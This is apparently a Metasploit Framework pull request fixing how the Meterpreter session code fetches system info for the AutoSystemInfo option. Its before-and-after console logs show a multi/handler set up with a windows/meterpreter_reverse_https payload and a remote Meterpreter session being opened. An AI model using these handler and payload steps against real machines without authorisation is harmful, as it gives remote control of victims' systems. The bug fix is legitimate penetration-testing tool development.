### PR TITLE
Correct use of sysinfo for handler's AutoSystemInfo option

### DIFF
--- a/lib/msf/base/sessions/meterpreter.rb
+++ b/lib/msf/base/sessions/meterpreter.rb
@@ -375,9 +375,9 @@ class Meterpreter < Rex::Post::Meterpreter::Client
             :host => self,
             :workspace => wspace,
             :data => {
-              :name => sysinfo["Computer"],
-              :os => sysinfo["OS"],
-              :arch => sysinfo["Architecture"],
+              :name => sys.config.sysinfo["Computer"],
+              :os => sys.config.sysinfo["OS"],
+              :arch => sys.config.sysinfo["Architecture"],
             }
           })
 


### PR DESCRIPTION
The issue was reported at https://community.rapid7.com/message/18815. Instead of calling sysinfo directly which was generating undefined sysinfo method error, it should call sys.config.sysinfo which is the correct API call for meterpreter.

Before this PR

``` ruby
[*] Processing start_multi_handler.rb for ERB directives.
resource (start_multi_handler.rb)> workspace -d sysinfo
[*] Deleted workspace: sysinfo
resource (start_multi_handler.rb)> workspace -a sysinfo
[*] Added workspace: sysinfo
resource (start_multi_handler.rb)> use exploit/multi/handler
resource (start_multi_handler.rb)> set PAYLOAD windows/meterpreter_reverse_https
PAYLOAD => windows/meterpreter_reverse_https
resource (start_multi_handler.rb)> set LHOST x.x.x.x
LHOST => x.x.x.x
resource (start_multi_handler.rb)> set LPORT 443
LPORT => 443
resource (start_multi_handler.rb)> set AutoSystemInfo true
AutoSystemInfo => true
resource (start_multi_handler.rb)> set DEBUG true
DEBUG => true
resource (start_multi_handler.rb)> exploit
[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Starting the payload handler...
[*] y.y.y.y:48974 (UUID: fe471005bb627e15/x86=1/windows=1/2015-05-27T08:38:30Z) Attaching orphaned/stageless session ...
[*] Meterpreter session 1 opened (x.x.x.x:443 -> y.y.y.y:48974) at 2015-07-02 11:33:23 +0500

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > hosts

Hosts
=====

address      mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------      ---  ----  -------  ---------  -----  -------  ----  --------
y.y.y.y

msf exploit(handler) >
```

The framework.log was having the error messages:

```
[07/02/2015 11:33:25] [e(0)] core: Error loading sysinfo: NoMethodError: undefined method `[]' for nil:NilClass
[07/02/2015 11:33:25] [d(0)] core: Call stack:
/opt/void-in/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:378:in `block (2 levels) in load_session_info'
```

After this PR:

``` ruby
root@kali:/opt/void-in/metasploit-framework# ./msfconsole -qr start_multi_handler.rb
[*] Processing start_multi_handler.rb for ERB directives.
resource (start_multi_handler.rb)> workspace -d sysinfo
[*] Deleted workspace: sysinfo
resource (start_multi_handler.rb)> workspace -a sysinfo
[*] Added workspace: sysinfo
resource (start_multi_handler.rb)> use exploit/multi/handler
resource (start_multi_handler.rb)> set PAYLOAD windows/meterpreter_reverse_https
PAYLOAD => windows/meterpreter_reverse_https
resource (start_multi_handler.rb)> set LHOST x.x.x.x
LHOST => x.x.x.x
resource (start_multi_handler.rb)> set LPORT 443
LPORT => 443
resource (start_multi_handler.rb)> set AutoSystemInfo true
AutoSystemInfo => true
resource (start_multi_handler.rb)> set DEBUG true
DEBUG => true
resource (start_multi_handler.rb)> exploit
[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Starting the payload handler...
[*] y.y.y.y:49163 (UUID: fe471005bb627e15/x86=1/windows=1/2015-05-27T08:38:30Z) Attaching orphaned/stageless session ...
[*] Meterpreter session 1 opened (x.x.x.x:443 -> y.y.y.y:49163) at 2015-07-02 11:39:15 +0500

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > hosts

Hosts
=====

address      mac  name          os_name    os_flavor  os_sp  purpose  info  comments
-------      ---  ----          -------    ---------  -----  -------  ----  --------
y.y.y.y           msf_test     Windows 7                    client

msf exploit(handler) >
```
